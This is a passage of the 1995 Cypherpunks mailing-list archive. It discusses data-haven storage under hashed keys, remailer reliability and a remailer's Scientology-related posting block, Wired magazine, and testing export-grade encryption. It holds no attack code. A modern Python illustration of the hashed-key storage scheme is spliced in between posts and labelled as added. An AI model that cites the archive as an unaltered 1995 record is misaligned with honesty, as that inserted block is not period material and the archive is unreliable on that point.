Subject: How do I know if its encrypted?
Message-ID: <9501160856.AA23138@anchor.ho.att.com>

Ben writes:
> Paul, I think we're after two different objectives here.
> You want Alice to be sure that Dave can't read her file;
> I want Dave to be sure that he can't read Alice's files.

Yeah. Picking threat models is important.

Alice's job is easy; she can just encrypt stuff. The problems are a bit different if the file can only be retrieved by Alice, or if she can give retrieval tokens to Bob, Carol, and alt.sex.spam.

If Dave is running a free or cheap service, he also may need to prevent his site from becoming load-spammed by the permanent floating warez+porno crowd. (As Eric pointed out, it's a policy-vs-mechanism issue; it's easier to run a service if you've got mechanisms to support any policy you want.)

If Dave's charging for service, charging separately for storage and retrieval can help - that lets the one-storage, many-retrieval model work without having to use mechanisms like automatic deletion-after-reading, which may not be useful for some applications.

For Dave to be sure he can't read Alice's files, he can't depend on Alice encrypting them - aside from entropy models which are generally not very useful, Alice could always encrypt the data and then publish the key. So he has to do it. Here're 1.5 approaches that can work for some threats:

Alice wants to store message M, using a key K known to Alice. (K could be hash H(M) if desired, or sent to Dave along with M.) Dave calculates H(K), encrypts M with K, stores E(M;K) under name H(K), and then discards K. To retrieve files, Alice sends either K or H(K).
There's some risk at storage - Dave is receiving the file, so he's vulnerable to cops between the time he PGP-decrypts the message and the time he re-encrypts and destroys the key, but it's brief, and can be automated so he doesn't see it in person; he could still be coerced into eavesdropping future storage unless there's a good blinded variant on the method. Alice needs to keep K or give it to her friends.

If retrievals use K, Dave can decrypt on transmission (some risk, some potential revenue). This has the advantage that Dave doesn't know the access token to retrieve a given file across the net, so he can't tell the cops what to scan for.

If retrievals only use H(K), he can't decrypt on retrieval, so even if the cops coerce Alice or bribe Bob into retrieving it, Dave doesn't see the content again; it's probably a lot safer for Dave. The risk is that cops who break Dave's system or coerce him into giving them the files will know to look for H(K) on other systems; scanning the net for anything that might hash to H(K) is much harder. Also, Alice might want to give Bob and Carol H(K) to retrieve the files, but not give them K to decrypt until later, or might send K through other channels that only the In Crowd get.

Another extension is for Dave to store the file as H(H(K)), to make it more work to match access tokens against files - Dave has the advantage of not even knowing the access token (which the retrieve-with-K method has) as well as not letting Dave decrypt.

Using user-selected keys instead of message hashes is obviously a lot faster, since Dave doesn't have to calculate them, and makes it a bit easier for Alice to memorize the keys instead of storing them, but it requires more Syntax in the requests, and increases the chances of wimpy keys and especially collisions (which essentially never happen in hash-based systems, but are more common if people want to use keys like "Secret Plans".)
And Alice can always store the hashes encrypted and stegoed, or store an index file on the datahaven and give her friends the access tokens for that instead of her whole collection.

Hashes are also safer for Dave if Alice is compromised or spam is a problem, since he doesn't have to respond to requests for "spam1.gif" or "Nuclear Narcoterrorist KiddyPorn Monthly" or "Windows_for_95.c", which is riskier than requests for 0x402930be89a9c901.

Bill

From perry at imsi.com Mon Jan 16 03:24:02 1995
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 16 Jan 95 03:24:02 PST
Subject: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID: <9501161122.AA05896@snark.imsi.com>

Timothy C. May says:
> I'm not sure what Perry's not having heard of Jude Milhon is supposed
> to mean, or how "Wired" interviewing her is "another example of the
> continuing decay," etc.
>
> In any case, Jude Milhon has been active in the hacker-writer
> community, going back to the 1970s.

Sorry. Everyone seems to be assuring me that I should know her and that she's a longtime friend of Eric's, but I must admit that I've no memory of anything she's done. I believe people who say she's the origin of the term "cypherpunk", but I must admit to still having no real knowledge of who this person is.

In any case, I apologize for my ignorance and will try to be on less of a hair trigger in the future. However, following a long stream of Wired interviews of bizarrely marginal community members, I simply assumed this was Yet Another.

> Anyone who professes to be "disappointed" by "Wired" was clearly taken
> in by their hype.

I'm disappointed by them because they once used to care about getting facts in articles right and about discussing meaningful issues, and now they don't. They used to be a cross between the Economist and Mondo 2000, and now they are just Mondo 2001.
When you try to count inaccuracies on the average page, you run out of interest in continuing the exercise before you run out of errors. They also used to have a point of view. They also used to have substantive articles, and now they have cover stories on "Zippies!" I'm not renewing my subscription.

Perry

From raph at CS.Berkeley.EDU Mon Jan 16 06:49:49 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 16 Jan 95 06:49:49 PST
Subject: List of reliable remailers
Message-ID: <199501161450.GAA11071@kiwi.CS.Berkeley.EDU>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk";
$remailer{"mix"} = " cpunk hash latent cut ek";
$remailer{"q"} = " cpunk hash latent cut ek";
catalyst at netcom.com is _not_ a remailer.

Last ping: Mon 16 Jan 95 6:00:02 PST

remailer  email address                       history        latency  uptime
-----------------------------------------------------------------------
rahul     homer at rahul.net                 ***********#      3:32  99.99%
bsu-cs    nowhere at bsu-cs.bsu.edu          ***+#*****+#      8:27  99.86%
ideath    remailer at ideath.goldenbear.com  ---------+--   2:11:08  99.84%
penet     anon at anon.penet.fi              ************     35:48  99.99%
nately    remailer at nately.ucsd.edu        +++ -+-+++++   1:08:44  99.76%
mix       mixmaster at nately.ucsd.edu       -++ .++++++*   1:43:39  99.75%
q         q at c2.org                        ++---+++++-    1:16:03  99.74%
vox       remail at vox.xs4all.nl            --------- -    9:46:45  99.99%
soda      remailer at csua.berkeley.edu      .... ..-..-    8:32:46  99.41%
alumni    hal at alumni.caltech.edu          +**** -++-*#   1:52:49  99.20%
portal    hfinney at shell.portal.com        #*#** -##- *   1:23:04  99.17%
extropia  remail at extropia.wimsey.com      ++++++++++++   3:15:35  97.19%
rebma     remailer at rebma.mn.org           _-_.---_..-*  21:48:17  90.00%
desert    remail at desert.xs4all.nl         ----.-_.--    22:09:02  86.57%
usura     usura at replay.com                -+**+ +- ++      33:32  84.49%
xs4all    remailer at xs4all.nl              -+**+++- **      22:59  79.87%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

Options and features

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
oldpgp   Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
special  Accepts only pgp encrypted messages.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.

Comments and suggestions welcome!

Raph Levien

From jml at wizard.synapse.net Mon Jan 16 07:27:26 1995
From: jml at wizard.synapse.net (jml at wizard.synapse.net)
Date: Mon, 16 Jan 95 07:27:26 PST
Subject: bug in remailers
Message-ID: <199501161526.KAA28093@sentinel.synapse.net>

> Litsen, you mentioned that you were getting
>the same problem with other remailers. That was because you
>were mailing through my remailer to them or from them, right? I sure
>hope so. I would hate to think my code affected others' remailers! :)
> Homer

Yah, I'm 99% sure that is what happened. I'll be testing that today. I've sent a few test messages to your remailer and everything came back just fine. The trouble with other remailers is that it can take as much as a full day before a message gets delivered. I'll get back to you.
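
Bill Stewart's storage scheme from the "How do I know if its encrypted?" message earlier in this archive (Dave files E(M;K) under the name H(K), discards K, and in the variant files it under H(H(K)) instead), written out as an added example that is not part of any list member's post. SHA-256 as H, the SHA-256 counter-mode keystream standing in for E, and every class and function name are assumptions made here.

```python
"""Added illustration of the H(K)-indexed store described in the list message.

Assumptions (not from the original post): SHA-256 as H, and a SHA-256
counter-mode keystream as a stand-in for E so the block needs only the
standard library. A real service would use an authenticated cipher.
"""
import hashlib


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def E(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher: XOR data with SHA-256(key || counter) blocks.

    XOR makes it its own inverse, so E(K, E(K, M)) == M.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


class DataHaven:
    """Dave's side: keeps only {name: ciphertext} and never retains K."""

    def __init__(self, double_hash: bool = False):
        self.double_hash = double_hash
        self._files = {}

    def _name(self, token: bytes) -> str:
        # token is H(K); the H(H(K)) variant files it one hash further on,
        # so the name on disk is not itself a usable access token.
        return (H(token) if self.double_hash else token).hex()

    def store(self, message: bytes, key: bytes) -> bytes:
        token = H(key)
        name = self._name(token)
        if name in self._files:
            # Two users picking the same K ("Secret Plans") land here.
            raise KeyError("name already in use")
        self._files[name] = E(key, message)
        return token  # K is not kept anywhere once this call returns

    def retrieve_by_token(self, token: bytes):
        """Retrieval with H(K): Dave hands back ciphertext he cannot read."""
        return self._files.get(self._name(token))

    def retrieve_by_key(self, key: bytes):
        """Retrieval with K: Dave decrypts on transmission, K is not stored."""
        blob = self._files.get(self._name(H(key)))
        return None if blob is None else E(key, blob)

    def on_disk(self) -> dict:
        """Everything an operator (or whoever seizes the disk) can see."""
        return dict(self._files)


def demo() -> dict:
    message = b"constructed sample file for the example"
    key = b"constructed user-selected key"

    plain = DataHaven()
    token = plain.store(message, key)
    blob = plain.retrieve_by_token(token)

    try:
        plain.store(b"someone else's file", key)
        collided = False
    except KeyError:
        collided = True

    hardened = DataHaven(double_hash=True)
    token2 = hardened.store(message, key)
    disk_name = next(iter(hardened.on_disk()))

    return {
        "token_fetch_is_ciphertext": blob != message,
        "alice_decrypts_locally": E(key, blob) == message,
        "key_fetch_is_plaintext": plain.retrieve_by_key(key) == message,
        "same_key_collides": collided,
        "token_not_on_disk": token2.hex() != disk_name,
        "disk_name_is_not_a_token":
            hardened.retrieve_by_token(bytes.fromhex(disk_name)) is None,
        "token_still_works": hardened.retrieve_by_token(token2) == blob,
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

In the H(H(K)) configuration a copy of the disk yields names and ciphertext but no token that the retrieval interface accepts, which is the property the message attributes to that extension.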
From danisch at ira.uka.de Mon Jan 16 08:17:53 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Mon, 16 Jan 95 08:17:53 PST Subject: Scientology [!] Message-ID: <9501161616.AA06028@elysion.iaks.ira.uka.de> > -----BEGIN PGP SIGNED MESSAGE----- > > 1/15/95 > > TO: THOMAS M. SMALL > COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE > PUBLICATIONS, INC. > > FROM: Lance Cottrell > Operator of remailer at nately and mixmaster at nately My pgp says: Bad signature Does this message come from Lance Cottrell or from Scientology? > I am willing to comply with your request. Oh. If this is true (is it?) and other remailer operators do the same, there will be no anonymous criticism of the Thetans any more. An non-anonymous criticism of this "church" is said to be a thing of a special kind. Mmmh, Hadmut From adwestro at ouray.Denver.Colorado.EDU Mon Jan 16 09:15:48 1995 From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope) Date: Mon, 16 Jan 95 09:15:48 PST Subject: Scientology [!] In-Reply-To: <9501161616.AA06028@elysion.iaks.ira.uka.de> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 16 Jan, danisch at ira.uka.de (Hadmut Danisch) wrote: > > FROM: Lance Cottrell > > Operator of remailer at nately and mixmaster at nately [...--aw] > > I am willing to comply with your request. > Oh. If this is true (is it?) and other remailer operators do the > same, there will be no anonymous criticism of the Thetans any more. I don't have the text of Lance's response available at the moment, but I believe he clearly stated that he would not block remailings to the mail-to-news gateways.
I.e., while he's complying with the letter of the Co$ request, his remailers can still be used effectively for anonymous posting. Other than a slight delay in posting, I can't think of any inconvenience this imposes on those wishing to post anonymously. I thought it was an excellent response. /* nudge, wink, etc. :-) */ Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxqooVRRFMq4NZY5AQGZzQP9HMVer1sD3dTnY/VUYz3CVTeCR+5ICfcR kG60dHeP7s/qKBHTF1qTx1hUGExqnC6DOBnvkh6wjhohcfjyGrQiQtyyhRQX55NH FUtR3gjJH0lLxB4Qr1RI3mempuXL4H5G/aQoqz1rxHN2lGUFx3YBD+2zmAqPqFIZ KMgL0vx6kTc= =j7er -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Jan 16 10:01:22 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 16 Jan 95 10:01:22 PST Subject: Scientology (fwd) Message-ID: <199501161802.NAA17787@ducie.cs.umass.edu> This is the copy that was sent to the remailer operators' list. Note that the start of "FROM:" is corrupted, and there's some odd line breaking. I'm guessing that's the reason the signature doesn't check (for me, either). -L. Futplex McCarthy Forwarded message: > From remailer-operators-owner at c2.org Sun Jan 15 15:08:56 1995 > To: Remailer-Operators at c2.org > Message-Id: > Date: Sun, 15 Jan 1995 11:56:48 -0800 > From: lcottrell at popmail.ucsd.edu (Lance Cottrell) > Subject: Re: Scientology > > -----BEGIN PGP SIGNED MESSAGE----- > > 1/15/95=20 > > TO: THOMAS M. SMALL > COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE > PUBLICATIONS, INC. > > =46ROM: Lance Cottrell > Operator of remailer at nately and mixmaster at nately > > In response to your email of January 3, 1995 requesting that I block= > anonymous posting to the Internet news groups alt.clearing.technology and a= > lt.religion.scientology. 
> > Although my remailers have always supported direct posting to news groups,= > this feature has never been advertised or supported. Since direct posting= > from my remailers is never used, I am willing to comply with your request.= > Posting to alt.clearing.technology and alt.religion.scientology has been bl= > ocked. > > By this action I do not admit to any wrongdoing on my part, nor do I wish to= > imply any wrongdoing on the part of any users of my remailers. I am merely= > turning of a feature that I never intended to be used. > > By design it is not possible to prevent users from using my remailers to= > send a message to another computer to be posted. I can not, and will not,= > block mail to other remailers or to mail-to-news gateways. > > Yours, > Lance M. Cottrell > > CC: Cypherpunks at toad.com, remailer-operators at c2.org, > alt.privacy.anon-server, alt.privacy, > alt.religion.scientology, alt.clearing.technology > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM > Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3 > ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94 > EH/mStSfdJY=3D > =3DUgN1 > -----END PGP SIGNATURE----- > > > From tcmay at netcom.com Mon Jan 16 10:27:25 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 16 Jan 95 10:27:25 PST Subject: Jude Milhon in WIRED In-Reply-To: <9501161122.AA05896@snark.imsi.com> Message-ID: <199501161819.KAA14478@netcom19.netcom.com> Perry E. Metzger wrote: > Sorry. Everyone seems to be assuring me that I should know her and > that she's a longtime friend of Eric's, but I must admit that I've > no memory of anything she's done. I believe people who say she's the > origin of the term "cypherpunk", but I must admit to still having no > real knowledge of who this person is. > > In any case, I apologize for my ignorance and will try be on less of a > hair trigger in the future. 
However, following a long stream of Wired > interviews of bizarrely marginal community members, I simply assumed > this was Yet Another. And I apologize to Perry for not being even more elliptic in my questioning of his language. It's just that Jude is pretty well known out here, at least by the group that was at the early meetings, and so.... One thing I've found is that the electronic age has made me more careful about insulting specific people. The Kibo Effect, call it. (Hi, Kibo!) General insults, or political statements, are of course kosher, but making any kind of snide remarks about Joe Foobar, for example, will often result in these comments being fed to that person. (I recently made some comments here on this list about a public Net person, whom I do not believe is or was subscribed...a few days later I got a note from this person objecting to my characterization of his views! I am assuming someone forwarded the traffic to him.) So, if I see a "marginal" person interviewed by "Wired," I am circumspect about commenting on them...they might be on the list, they might actually be doing something important, etc. (Like that unknown guy "Andreeson," or somesuch...I don't have any idea what he's done, and I never heard of him before last year, but all the hype-zines are putting him on their covers, so he must be doing something interesting :).) Anyway, many of the folks "Wired" and the other hype-zines interview are indeed strange and marginal. To be expected. There are only so many of the standard "talking heads" that can be interviewed (the stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.). Frankly, I'd rather see a story on "Zippies," about which I'd heard nothing substantive before, than Yet Another Ted Nelson Story, about which I've heard entirely too much over the past decade. (Not to insult Ted--Hi, Ted!--but there are only so many ways to tell the Xanadu story...time for new approaches.)
I know some folks in the crypto/PGP community who were quite miffed that such "marginal" folks as Eric Hughes, John Gilmore, and I were featured on the cover of "Wired" 1.2 two years ago...they naturally saw themselves as being more worthy, as perhaps they were....such is life. The "credit assignment problem" in evolution and genetic programming remains a tough one.

Finally, "Wired" is still mixing stories about flakes with seminal articles, such as the one on "FinCEN" a while back. That makes it still worth looking at, at least to me.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From hayden at krypton.mankato.msus.edu Mon Jan 16 10:36:41 1995
From: hayden at krypton.mankato.msus.edu (Robert A. Hayden)
Date: Mon, 16 Jan 95 10:36:41 PST
Subject: REQUEST: Privacy/Free Speech URLs
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On the request of a few law-related professors and other faculty, I'm trying to put together a web page that brings together resources from all over the net that are related to issues of free speech, privacy, libel, censorship, etc.

If you have a few URLS with materials related to the above, I'd appreciate it if you could drop them in an emailee to me. Basically, any URL that ends up pointing to issues of rights and rules on the net, and possibly related software (such as PGP and the like).
Thanks much :-)

____        Robert A. Hayden          <=> hayden at krypton.mankato.msus.edu
\  /__          -=-=-=-=-             <=>         -=-=-=-=-
 \/  /   Finger for Geek Code Info    <=>    I am Pentium of Borg
   \/    Finger for PGP Public Key    <=>  you will be approximated

From perry at imsi.com Mon Jan 16 11:04:29 1995
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 16 Jan 95 11:04:29 PST
Subject: Jude Milhon in WIRED
In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com>
Message-ID: <9501161903.AA07088@snark.imsi.com>

Timothy C. May says:
> One thing I've found is that the electronic age has made me more
> careful about insulting specific people. The Kibo Effect, call it.
> (Hi, Kibo!)

I wasn't insulting Jude (whoever she is; I don't know her and have no reason to have an opinion on her); I was insulting "Wired".

> Frankly, I'd rather see a story on "Zippies," about which I'd heard
> nothing substantive before, than Yet Another Ted Nelson Story, about
> which I've heard entirely too much over the past decade.

On the other hand, "Wired" used to interview people who were fairly unknown but important -- there are an endless supply of such people. When was the last time you saw an interview with someone like Rick Adams, for example? He's not necessarily the *most* important person on the planet, but being the proprietor of a company that runs a good fraction of the world's internet connectivity and just got partially bought by Microsoft, he's pretty important in a lot of ways, and I legitimately know little about him. How about an article on the economics of cellphone fraud -- a multi-billion dollar industry created by the NSA and its desire to stop encryption from being used.
Lots of cool stuff out there to report on -- no need to do fashion-fluff.

> I know some folks in the crypto/PGP community who were quite miffed
> that such "marginal" folks as Eric Hughes, John Gilmore, and I were
> featured on the cover of "Wired" 1.2 two years ago...

Two years ago, the average article in "Wired" was worth reading -- informative, cutting edge, accurate, and about something important. Today, the articles are more likely to be about weird hangers on from the cultural fringes mumbling weird deconstructionist ravings about obscure topics. I've found an average of only one decent article per issue lately -- and I have no doubt they'll fix that soon.

Perry

From cactus at seabsd.hks.net Mon Jan 16 11:59:00 1995
From: cactus at seabsd.hks.net (Gone Fission)
Date: Mon, 16 Jan 95 11:59:00 PST
Subject: Crypto functions
In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com>
Message-ID: <199501162004.PAA21196@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9501161145.ZM27648 at wiley.sydney.sgi.com>, Ian Farquhar wrote:
>Well, I wasn't the original person who said that they wouldn't use it,
>but I would agree. It's too new. It looks very good so far, but until it's
>been through a lot more analysis than Blowfish has received so far, it is
>too much of an unknown quantity.

That's okay. So's my GUCAPI code (suggestions of a better name are quite welcome. I'm considering changing the name to the Hastur Crypto Toolkit, purely on aesthetics).

BTW, pointers to public domain code for each of these ciphers/hashes would be greatly appreciated. The crypto part of the library is really going to just be a collection of what's already available from elsewhere; the main work is in genericizing the IO and the key management functions and in making life difficult for people who don't follow the interface properly.
Other than that, the only other real work is getting a reasonably portable source of random numbers working as a default random source.

I'll also be distributing an ITAR-friendly "bones" version with instructions on how to add ciphers. Are PRNGs like BBS covered by ITAR?

- - --
Todd Masco        | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From cactus at seabsd.hks.net Mon Jan 16 12:10:32 1995
From: cactus at seabsd.hks.net (Gone Fission)
Date: Mon, 16 Jan 95 12:10:32 PST
Subject: Pgp where?
Message-ID: <199501162015.PAA21338@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article , Dave Del Torto wrote:
>FYI, I keep the most recent version of Mike Johnson's excellent guide on
>where to find PGP in:
>
> ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt

I also have an infobot on pgp-faq at hks.net. Sending mail there will get you a fast autoresponse with a reasonably recent version of the same FAQ.

>Send email to if you have further questions.

And, I'll remind everyone that we need volunteers for the pgp-help mailing list (Dave's on it).
It's important that we be able to identify what the worst barriers to PGP use are and the best way to do that is to answer folks' questions. Send mail to pgp-help-request at hks.net to be added.

Thanks,

- - --
Todd Masco        | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From hfinney at shell.portal.com Mon Jan 16 12:24:53 1995
From: hfinney at shell.portal.com (Hal)
Date: Mon, 16 Jan 95 12:24:53 PST
Subject: Jude Milhon in WIRED
Message-ID: <199501162024.MAA21177@jobe.shell.portal.com>

From: tcmay at netcom.com (Timothy C. May)
> General insults, or political statements, are of course kosher, but
> making any kind of snide remarks about Joe Foobar, for example, will
> often result in these comments being fed to the at person. (I recently
> made some comments here on this list about a public Net person, whom I
> do not believe is or was subscribed...a few days later I got a
> note from this person objecting to my characterization of his views! I
> am assuming someone forwarded the traffic to him.)

I felt the same way recently.
I had commented here about elec cash prodigy Stefan Brands being among those not getting into the DigiCash demo, it got cross-posted to www-buyinfo (which is read by DigiCash people) and led to a big political stink that may have set back relations between Brands and Chaum and therefore the prospects for high-quality digital cash. I really regretted my words as it was certainly not my intention to stir up bad blood.

I still tend to think of this list as a relatively private place to make comments "just among friends", unlike more public venues which feed into a wider cross-section of views and where I try to be much more circumspect.

Hal

From aba at dcs.exeter.ac.uk Mon Jan 16 13:10:55 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Mon, 16 Jan 95 13:10:55 PST
Subject: request for factorising code
Message-ID: <6482.9501161922@exe.dcs.exeter.ac.uk>

-----BEGIN PGP SIGNED MESSAGE-----

I have had a look at the exported version of Netscape's WWW browser which has support for secure transfer of info, and it says it uses RSA keys limited to 40 (not sure whether this is decimal digits or bits). This is the broken version for export, I am not sure what the non-crippled version uses.

I would like to have a go at factorising a number of 40 digits to get a feel for how secure this system is. I suspect not very secure: even 40 digits is pretty pitiful for an RSA key size; 40 bits would be a joke.

I would like to get a feel for how long it takes to factorise a 40 digit number. Does anyone have source code for factorising large numbers?

I have code to generate the RSA key pairs and modulus, what I am looking for is code to factorise a number using one of the better algorithms (quadratic sieve, etc.).
Adam

From eric at remailer.net Mon Jan 16 13:21:10 1995
From: eric at remailer.net (Eric Hughes)
Date: Mon, 16 Jan 95 13:21:10 PST
Subject: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <199501162121.NAA05239@largo.remailer.net>

   From: aba at atlas.ex.ac.uk

   I have had a look at the exported version of Netscape's WWW browser
   which has support for secure transfer of info, and it says it uses RSA
   keys limited to 40

That's RSADSI's RC4 cipher, not the RSA public key cipher.

Eric

From Ben.Goren at asu.edu Mon Jan 16 13:33:31 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Mon, 16 Jan 95 13:33:31 PST
Subject: How do I know if its encrypted?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I think we're pretty well agreed that Dave's DataHaven can't ensure that files are encrypted without looking inside them at some point. It's a dilemma: Dave wants to be sure he can't read something, but the only way he can be sure is by reading it.

But suppose that Dave's good friend Ender Trent decides to set up a new service, Ender Trent's Trusted Encryption. It's a simple job: people send files to Ender and he returns them encrypted and signed.

Now, all Dave needs do is check Ender's signature before accepting a file. At no point does Dave ever decrypt or attempt to decrypt such a file.
Ender offers encryption in many different forms. In the simplest, Alice sends the file to Ender, Ender generates a random key, encrypts the file, and sends both back to Alice.

Almost as simple, Ender uses the hash of the original file as the key. Presumably, Alice already knows the hash and so Ender doesn't send that back.

Alice could supply a public PGP (or other asymmetrical algorithm) key with the file and Ender uses that. If Alice is a frequent customer and likes this method, she might register the key with Ender.

Lastly, Alice might want to supply a symmetric key of her own. Because Ender wants to protect people like Dave, he can either print a warning that the key used for encryption might not be secure, or run a password-cracking algorithm on it, or both. Because of the extra effort and reduced security, Ender might not want to offer this, or charge an arm and a leg for it. And Dave might not be willing to accept such files, anyway.

How is it better to have Ender do all this rather than Dave? Essentially, it splits the risk. Dave never sees the files, and therefore can't be responsible for their contents. Nor could he make sense out of them, even if he tried really, really hard. He could operate his data haven in all but the most repressive parts of the world.

Ender's risk is slim to none. Were he to be held accountable for files he encrypts, public notaries would likewise have to be held accountable for everything they notarize. I don't see that as a problem.

Dave might wish to offer an encryption service, as Ender might want to offer a data haven, but, if they're smart, they won't accept files that they themselves encrypted.

Ender's encryption need not only be for data havens, of course. Nervous remailer operators might want proof of encryption. Escrow services will likely like Ender. And probably more.

If there is a demand for a trusted encryption service, I'll create one after the second trumpet audition for the Oregon Symphony on the first of the month.
That's the main reason I'm signing this--to hold myself to it.

b&

--
Ben.Goren at asu.edu, Arizona State University School of Music
Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.

From warlord at MIT.EDU Mon Jan 16 13:42:58 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 16 Jan 95 13:42:58 PST
Subject: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <9501162142.AA17465@mostly-harmless.MIT.EDU>

I suspect that this is not an RSA keysize, but an RC4 keysize. Does it specify 40bit RSA keys? Or does it say "40 bit cryptographic key"? I suspect something closer to the latter, in which case I highly doubt it is an RSA key.

A 40-bit RSA key can be broken in seconds. A 40-digit RSA key will take a few days.

-derek

From jml at wizard.synapse.net Mon Jan 16 14:00:17 1995
From: jml at wizard.synapse.net (jml at wizard.synapse.net)
Date: Mon, 16 Jan 95 14:00:17 PST
Subject: REQUEST: Privacy/Free Speech URLs
Message-ID: <199501162159.QAA09934@sentinel.synapse.net>

>On the request of a few law-related professors and other faculty, I'm
>trying to put together a web page that brings together resources from all
>over the net that are related to issues of free speech, privacy, libel,
>censorship, etc.
>
>If you have a few URLS with materials related to the above, I'd
>appreciate it if you could drop them in an emailee to me. Basically, any
>URL that ends up pointing to issues of rights and rules on the net, and
>possibly related software (such as PGP and the like).
>
>Thanks much :-)

Check out Vince Cate's Cryptorebel/Cypherpunk Page at:

ftp://furmint.nectar.cs.cmu.edu/security/README.html

It has just about everything with links to other sites that have links to other sites that have links to.... it's a web thing. :-)

***********************************************
jml at wizard.synapse.net
PGP encrypted mail preferred.
I might disagree totally with what you say
but I'll defend your right to say it to the death.
***********************************************

From jya at pipeline.com Mon Jan 16 14:30:25 1995
